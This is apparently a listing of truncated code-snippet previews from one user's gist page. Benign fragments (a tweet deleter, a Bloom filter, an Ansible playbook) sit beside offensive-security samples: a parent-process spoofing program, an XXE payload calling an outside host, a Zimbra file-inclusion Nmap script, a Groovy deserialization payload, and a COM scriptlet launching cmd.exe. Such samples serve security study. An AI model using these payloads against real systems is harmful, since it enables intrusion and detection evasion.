JohnTroony

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This script will delete all of the tweets in the specified account.
You may need to hit the "more" button on the bottom of your twitter profile
page every now and then as the script runs, this is due to a bug in twitter.

You will need to get a consumer key and consumer secret token to use this
script, you can do so by registering a twitter application at https://dev.twitter.com/apps

JohnTroony

#!/usr/bin/python3
#
# Simple Bloom filter implementation in Python 3
# Copyright 2017 Hector Martin "marcan" <marcan@marcan.st>
# Licensed under the terms of the MIT license
#
# Written to be used with the Have I been pwned? password list:
#   https://haveibeenpwned.com/passwords
#
# Download the pre-computed filter here (629MB, k=11, false positive p=0.0005):

JohnTroony

- name: DO
  hosts: localhost
  vars:
    project_name: "PUT A NAME FOR YOUR PROJECT HERE"
    do_token: "PUT YOUR DIGITAL OCEAN API KEY HERE ==> https://cloud.digitalocean.com/settings/api/tokens"
    repository: "PUT YOUR REPOSITORY URL HERE"

  tasks:
    - name: LOCAL | Generate SSH key
      shell: ssh-keygen -b 2048 -t rsa -f ~/.ssh/{{project_name}} -q -N ""

JohnTroony

I have done some preliminary research into this bug and so far it does not seem like a backdoor. Just some really weird logic when handling routes, and rendering templates.

As to why widgetConfig[code] executes via a POST request, it is because of the following code located in /includes/vb5/frontend/applicationlight.php


$serverData = array_merge($_GET, $_POST);

if (!empty($this->application['handler']) AND method_exists($this, $this->application['handler']))
{
    $app = $this->application['handler'];

JohnTroony

/* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */
/* spoof.exe explorer.exe calc.exe */
#include <windows.h>
#include <tlhelp32.h>

#define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000

typedef struct _STARTUPINFOEX {
  STARTUPINFO                 StartupInfo;
  LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList;

JohnTroony

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

JohnTroony

local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"

description = [[
A 0 day was been released on the 6th december 2013 by rubina119, and was patched in Zimbra 7.2.6.

The vulnerability is a local file inclusion that can retrieve any file from the server.

JohnTroony

// Compile with -std=c11

#include <stdlib.h>
#include <stdarg.h>
#include <stdio.h>
#include <inttypes.h>
#include <string.h>
#include <limits.h>

#define MAX_STR_LEN 4095

JohnTroony

<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="groovy.util.Expando" reference="../../../.."/>
            <owner class="java.lang.ProcessBuilder">
              <command>

JohnTroony

<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<script language="JScript">
		<![CDATA[
	
			var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");